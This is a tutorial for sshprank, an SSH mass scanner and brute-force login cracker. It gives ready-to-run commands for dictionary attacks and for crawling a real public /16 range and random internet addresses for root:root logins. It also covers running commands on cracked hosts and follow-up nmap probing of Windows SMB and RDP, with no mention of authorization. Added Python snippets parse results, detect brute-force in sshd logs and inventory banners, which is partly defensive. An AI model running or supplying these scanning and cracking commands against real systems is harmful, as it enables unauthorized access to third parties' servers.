sshprank: SSH mass-scanner, login cracker and banner grabber

This article is about sshprank, a fast network scanner that looks for SSH servers. The program searches for hosts running SSH and tries to log in with the specified credentials, that is, it performs an automated brute-force attack. It can also grab the banners of a large number of SSH servers very quickly.

SSH is the most important service for connecting to remote Linux computers and executing commands on them. It is also heavily used on FreeBSD, and sometimes even on Windows.

How to install sshprank

Install sshprank on Kali Linux

sudo apt install python3-pip
git clone https://github.com/noptrix/sshprank
cd sshprank
sudo pip3 install -r docs/requirements.txt
./sshprank.py -H

Install sshprank on BlackArch

sudo pacman -S sshprank

How to install sshprank on Windows

Start by installing Python according to the article “How to install Python and PIP on Windows 10”.

After installing Python and PIP, download the sshprank source code archive: https://github.com/noptrix/sshprank/archive/master.zip

Unzip the archive.

Open a command prompt or PowerShell (if you don’t know how, then see the article “How to set up the PowerShell environment on Windows and Linux”).

Go to the folder of the unpacked archive using the cd command (you will have a different path to the folder, so edit the command accordingly):

cd C:\Users\MiAl\Downloads\sshprank-master\

Install the required dependencies:

pip install -r docs\requirements.txt

Perform a check (program usage should be displayed):

python .\sshprank.py -H

Further work with the program is the same as in Linux, but instead of sshprank you need to specify python .\sshprank.py, for example:

python .\sshprank.py -h 138.201.59.125 -v

How to create a host list

The sshprank program does not directly accept IP ranges or subnets, although a little later I will show how you can still scan subnets with sshprank. For now, sshprank needs a list of hosts, one per line.

So, I want to scan the range 138.201.0.0/16. To list hosts, I run the following command:

echo -e 138.201.{0..255}.{0..255}"\n" | sed 's/ //' > hosts.txt

Check what was generated:

head -n 20 hosts.txt

How to launch sshprank

In sshprank, hosts can be specified with the following options:

  -h <host:[ports]>     - single host to crack. multiple ports can be separated
                          by comma, e.g.: 22,2022,22222 (default port: 22)

  -l <file>             - list of hosts to crack. format: <host>[:ports]. multiple
                          ports can be separated by comma (default port: 22)

That is, if we want to specify a single host, then this can be done using the -h option:

./sshprank.py -h 138.201.59.125

You can also specify ports (otherwise, the default port 22 is used for SSH service):

./sshprank.py -h 138.201.59.125:22,2022,22222

By default, the program displays no information at all; it does not even show the cracked hosts, logins and passwords. To display this information, use the -v option:

./sshprank.py -h 138.201.59.125 -v

If the login and password are not specified, then “root” is used as the login, and “root” is used as the password.

How to specify login and password dictionaries in sshprank

To specify a username, password or dictionaries the following options are used:

  -u <user>             - single username (default: root)
  -U <file>             - list of usernames
  -p                    - single password (default: root)
  -P <file>             - list of passwords
  -C <file>             - list of user:pass combination

Tiny dictionaries are provided with the program:

  • lists/user.txt – usernames
  • lists/pws.txt – passwords
  • lists/combo.txt – user name and password combinations

But these dictionaries are very tiny; I would recommend using other, more suitable and bigger ones.

Run sshprank against the target host using the specified dictionaries for usernames and passwords:

sshprank -h 192.168.0.100 -U user.txt -P passwords.txt -v

sshprank results

If we had not used the -v option, practically nothing would have been output. The -v option displays information about connection attempts, successfully cracked accounts, and the reasons for failures, for example:

  • [!] could not connect: - the SSH service is not running, or the host is offline.
  • [!] login failure: … (auth timeout) - the most likely reason is a wrong username or password.
  • [!] login failure: … (auth failed) - the server explicitly reported a failed login (invalid username or password).
  • [!] login failure: … (pubkey auth) - authentication failed because login on this server is performed with a public key rather than a password.

Pay attention to the line with a green asterisk:

[*] found login: 192.168.0.100:22:mial:2

That is, the login (mial) and password (2) for the service on port 22 on the host 192.168.0.100 were found.

All successfully found logins and passwords are saved to the owned.txt file in the current working directory. The name and path of the file can be changed with the -o <file> option.
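To process a finished run rather than read owned.txt by eye, the following added example (not part of sshprank) parses the <host>:<port>:<user>:<pass> format described above into a per-host report for an authorized credential audit, and flags accounts that still accept the root:root pair sshprank tries by default. The sample lines are constructed; note that a password may itself contain a colon, so the line must be split at most three times.

```python
"""Parse sshprank's owned.txt output (<host>:<port>:<user>:<pass>, one per line)
into a per-host report for an authorized credential audit.

Added example; not part of sshprank. The sample lines below are constructed."""
from collections import defaultdict

# Constructed sample of owned.txt content; the second line repeats a host on a
# non-default port and the last password itself contains a colon.
SAMPLE_OWNED = """\
192.168.0.100:22:mial:2
192.168.0.100:2022:root:root
192.168.0.101:22:backup:s3cret:part
"""

# The pair sshprank tries when no -u/-p/-U/-P/-C option is given (see its help text).
DEFAULT_CREDENTIAL = ("root", "root")


def parse_owned(text):
    """Split each non-empty line into host, port, user and password.

    The password is the last field and may contain ':' (the format has no
    escaping), so split at most three times from the left.
    """
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line:
            continue
        parts = line.split(":", 3)
        if len(parts) != 4:
            raise ValueError(f"line {lineno}: expected host:port:user:pass, got {line!r}")
        host, port, user, password = parts
        entries.append({"host": host, "port": int(port), "user": user, "password": password})
    return entries


def report(entries):
    """Group findings per host and flag hosts where root:root was accepted."""
    per_host = defaultdict(list)
    for entry in entries:
        per_host[entry["host"]].append(entry)
    summary = {}
    for host, found in sorted(per_host.items()):
        summary[host] = {
            "accounts": sorted({(e["port"], e["user"]) for e in found}),
            "default_root": any((e["user"], e["password"]) == DEFAULT_CREDENTIAL for e in found),
        }
    return summary


if __name__ == "__main__":
    for host, info in report(parse_owned(SAMPLE_OWNED)).items():
        flag = " (root:root accepted!)" if info["default_root"] else ""
        accounts = ", ".join(f"{user}@{port}" for port, user in info["accounts"])
        print(f"{host}: {accounts}{flag}")
```

Feed it the real file with `report(parse_owned(open("owned.txt").read()))`; the per-host grouping is what you want when the same machine shows up on several ports or with several weak accounts.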

How to scan a large number of SSH

We can specify a list of hosts using the following option:

  -l <file>             - list of hosts to crack. format: <host>[:ports]. multiple
                          ports can be separated by comma (default port: 22)

Launch Example:

./sshprank.py -l hosts.txt -U lists/user.txt -P lists/pws.txt -v

When many hosts are scanned, sshprank's output becomes too noisy to follow. To avoid checking the owned.txt file by hand all the time, you can use the following commands:

touch owned.txt
tail -f owned.txt

The first command creates the file if it does not already exist, and the second immediately displays every new line as it is appended to the file.
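The same activity looks very different from the receiving side: every attempt sshprank makes is one "Failed password" line in the target's sshd log, clustered tightly in time and typically spread over several usernames. The following added example (not part of sshprank) implements that detection over constructed log lines with a per-source sliding window; it assumes an ISO-8601 timestamp prefix such as rsyslog's high-precision format writes, so the regex needs adjusting for the classic "Jan 12 10:15:01" prefix.

```python
"""Flag SSH password brute-force from sshd log lines: many 'Failed password'
events from one source address inside a short window, often across several
usernames, which is exactly the pattern a mass login cracker produces.

Added detection example, not part of sshprank. The log lines are constructed
and assume an ISO-8601 timestamp prefix (rsyslog high-precision format)."""
import re
from collections import defaultdict, deque
from datetime import datetime

FAILED_RE = re.compile(
    r"^(?P<ts>\S+) \S+ sshd\[\d+\]: Failed password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+ ssh2$"
)

# Constructed sample: one legitimate key login, a burst of six failures from
# 192.0.2.10 across three usernames, and two isolated failures from 198.51.100.7.
SAMPLE_LOG = """\
2024-05-01T10:15:01+00:00 bastion sshd[4101]: Accepted publickey for deploy from 203.0.113.5 port 50100 ssh2
2024-05-01T10:15:02+00:00 bastion sshd[4102]: Failed password for root from 192.0.2.10 port 40001 ssh2
2024-05-01T10:15:02+00:00 bastion sshd[4103]: Failed password for root from 192.0.2.10 port 40002 ssh2
2024-05-01T10:15:03+00:00 bastion sshd[4104]: Failed password for invalid user admin from 192.0.2.10 port 40003 ssh2
2024-05-01T10:15:03+00:00 bastion sshd[4105]: Failed password for invalid user admin from 192.0.2.10 port 40004 ssh2
2024-05-01T10:15:04+00:00 bastion sshd[4106]: Failed password for mial from 192.0.2.10 port 40005 ssh2
2024-05-01T10:15:05+00:00 bastion sshd[4107]: Failed password for mial from 192.0.2.10 port 40006 ssh2
2024-05-01T10:20:00+00:00 bastion sshd[4200]: Failed password for alice from 198.51.100.7 port 51000 ssh2
2024-05-01T10:31:00+00:00 bastion sshd[4201]: Failed password for alice from 198.51.100.7 port 51001 ssh2
"""


def detect_bruteforce(lines, threshold=5, window_seconds=60):
    """Return {source_ip: info} for every source that produced at least
    `threshold` password failures within any `window_seconds` span."""
    recent = defaultdict(deque)   # ip -> failure timestamps still inside the window
    users = defaultdict(set)
    total = defaultdict(int)
    alerts = {}
    for line in lines:
        m = FAILED_RE.match(line.strip())
        if not m:
            continue              # accepted logins, disconnects etc. are not failures
        ts = datetime.fromisoformat(m["ts"])
        ip, user = m["ip"], m["user"]
        total[ip] += 1
        users[ip].add(user)
        window = recent[ip]
        window.append(ts)
        # drop failures that have fallen out of the sliding window
        while (ts - window[0]).total_seconds() > window_seconds:
            window.popleft()
        if len(window) >= threshold and ip not in alerts:
            alerts[ip] = {"first_alert_at": ts.isoformat()}
    for ip in alerts:
        alerts[ip]["failures"] = total[ip]
        alerts[ip]["users"] = sorted(users[ip])
    return alerts


if __name__ == "__main__":
    for ip, info in detect_bruteforce(SAMPLE_LOG.splitlines()).items():
        print(f"{ip}: {info['failures']} failures, users {info['users']}, "
              f"alerted at {info['first_alert_at']}")
```

The threshold and window are the knobs to tune: sshprank with its default 20 login threads trips a 5-in-60-seconds rule within the first second, while a user mistyping a password twice in ten minutes does not.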

How to quickly grab SSH banners in a large network

To do this, use the -b option:

  -b <file>             - list of hosts to grab sshd banner from
                          format: <host>[:ports]. multiple ports can be
                          separated by comma (default port: 22)

That is, with this option you can specify a list of hosts in the same format as the -l option. Only the operating mode will change – banners will be collected instead of brute-force.

The following command saves the results to the specified file:

./sshprank.py -b hosts.txt > ssh_banners.txt

You can monitor the contents of this file in the same way:

touch ssh_banners.txt
tail -f ssh_banners.txt

Banners can be used for various purposes. For example, you can find all Windows computers running the SSH service:

grep -i windows ssh_banners.txt

On Windows servers, the SMB and RDP service ports are often open, and you can play with them.

To filter hosts running Windows:

grep -i windows ssh_banners.txt | awk -F ':' '{ print $1 }' > windows_hosts.txt

Looking for running SMB and NetBIOS services:

sudo nmap -iL windows_hosts.txt -p 139,445 --open

Scan for open RDP ports:

sudo nmap -iL windows_hosts.txt -p 3389 -sU -sS --open

An example of obtaining information about RDP and the name of a Windows computer:

sudo nmap -p 3389 -sU -sS --script 'rdp-*' 138.201.134.34

To find computers running FreeBSD:

grep -i bsd ssh_banners.txt

Using the banners, you can search for old versions of Linux distributions or for specific versions of an SSH implementation that are known to be vulnerable, perform statistical analysis, and more.
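The grep filters above work for one keyword at a time; the following added example (not part of sshprank) turns the whole banner file into an inventory instead. It assumes each line of ssh_banners.txt has the form host:port:banner (the awk -F ':' '{ print $1 }' filter above relies on the host being the first colon-separated field), splits the banner according to the SSH-protoversion-softwareversion [comments] layout of RFC 4253, guesses the platform from it, and counts hosts per implementation version. The sample lines are constructed.

```python
"""Turn a banner-grab result file into an inventory: which SSH implementation,
version and platform each host runs, plus counts per implementation version,
so that outdated builds can be found without grepping by hand.

Added example, not part of sshprank. It assumes each line of ssh_banners.txt is
'host:port:banner'; the sample lines are constructed."""
import re
from collections import Counter

# RFC 4253 identification string: SSH-protoversion-softwareversion [SP comments]
BANNER_RE = re.compile(r"^SSH-(?P<proto>[\d.]+)-(?P<software>\S+)(?:\s+(?P<comments>.*))?$")

SAMPLE_BANNERS = """\
138.201.0.10:22:SSH-2.0-OpenSSH_7.4
138.201.0.11:22:SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.6
138.201.0.12:2022:SSH-2.0-OpenSSH_for_Windows_8.1
138.201.0.13:22:SSH-2.0-OpenSSH_9.6 FreeBSD-20240104
138.201.0.14:22:SSH-2.0-dropbear_2019.78
138.201.0.15:22:not an ssh banner
"""


def platform_from(software, comments):
    """Best-effort platform guess from the banner text alone."""
    text = f"{software} {comments}".lower()
    if "windows" in text:
        return "windows"
    if "bsd" in text:
        return "bsd"
    if any(word in text for word in ("ubuntu", "debian", "linux")):
        return "linux"
    return "unknown"


def parse_banner_file(text):
    """Return one record per line; lines that are not an SSH banner are kept
    with parsed=False so they are not silently dropped from the inventory."""
    records = []
    for raw in text.splitlines():
        if not raw.strip():
            continue
        host, port, banner = raw.split(":", 2)   # the banner itself may contain ':'
        m = BANNER_RE.match(banner.strip())
        if not m:
            records.append({"host": host, "port": int(port), "parsed": False, "raw": banner})
            continue
        comments = m["comments"] or ""
        records.append({
            "host": host, "port": int(port), "parsed": True,
            "software": m["software"], "comments": comments,
            "platform": platform_from(m["software"], comments),
        })
    return records


def version_counts(records):
    """Hosts per software string (e.g. OpenSSH_7.4), the basic statistic."""
    return Counter(r["software"] for r in records if r["parsed"])


def hosts_on(records, platform):
    """Hosts whose banner points at the given platform ('windows', 'bsd', 'linux')."""
    return sorted(r["host"] for r in records if r["parsed"] and r["platform"] == platform)


if __name__ == "__main__":
    recs = parse_banner_file(SAMPLE_BANNERS)
    for software, n in version_counts(recs).most_common():
        print(f"{n:3d}  {software}")
    print("windows hosts:", hosts_on(recs, "windows"))
    print("unparsed:", [r["host"] for r in recs if not r["parsed"]])
```

The version counter is the useful part for a large range: sort it, and the oldest implementation strings with the highest counts are the hosts to check against your patch records first.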

Masscan options

sshprank uses the Masscan module, and also has the -m option which can be used to pass options to Masscan itself. A few examples:

First scan, then crack the SSH services that were found:

sudo ./sshprank -m '-p22,2022 --rate=5000 --source-ip 192.168.13.37 --range 192.168.13.1/24'

Generate 1000 random IPv4 addresses, port-scan them (tcp/22 here) at 1000 packets per second, and crack the login 'root:root' on the sshds that were found:

sudo ./sshprank -m '-p22 --rate=1000' -r 1000 -v

You can specify not only these, but any Masscan options.

All sshprank options

modes

  -h <host:[ports]>     - single host to crack. multiple ports can be separated
                          by comma, e.g.: 22,2022,22222 (default port: 22)

  -l <file>             - list of hosts to crack. format: <host>[:ports]. multiple
                          ports can be separated by comma (default port: 22)

  -m <opts> [-r <num>]  - pass arbitrary masscan opts, portscan given hosts and
                          crack for logins. found sshd services will be saved to
                          'sshds.txt' in supported format for '-l' option and
                          even for '-b'. use '-r' for generating random ipv4
                          addresses rather than scanning given hosts. these
                          options are always on: '-sS -oX - --open'.
                          NOTE: if you intent to use the '--banner' option then
                          you need to specify '--source-ip <some_ipaddr>' which
                          is needed by masscan.

  -b <file>             - list of hosts to grab sshd banner from
                          format: <host>[:ports]. multiple ports can be
                          separated by comma (default port: 22)

options

  -r <num>              - generate <num> random ipv4 addresses, check for open
                          sshd port and crack for login (only with -m option!)
  -c <cmd>              - execute this <cmd> on host if login was cracked
  -u <user>             - single username (default: root)
  -U <file>             - list of usernames
  -p                    - single password (default: root)
  -P <file>             - list of passwords
  -C <file>             - list of user:pass combination
  -x <num>              - num threads for parallel host crack (default: 20)
  -s <num>              - num threads for parallel service crack (default: 10)
  -X <num>              - num threads for parallel login crack (default: 20)
  -B <num>              - num threads for parallel banner grabbing (default: 50)
  -T <sec>              - num sec for connect timeout (default: 2s)
  -R <sec>              - num sec for (banner) read timeout (default: 2s)
  -o <file>             - write found logins to file. format:
                          <host>:<port>:<user>:<pass> (default: owned.txt)
  -e                    - exit after first login was found. continue with other
                          hosts instead (default: off)
  -v                    - verbose mode. show found logins, sshds, etc.
                          (default: off)

misc

  -H                    - print help
  -V                    - print version information

Conclusion

sshprank comes in handy when your goal is SSH servers scattered across a large network or when you need to collect SSH banners over large network ranges very quickly. For example, from the /16 range (65536 IP addresses), you can collect SSH service banners in just a few minutes.
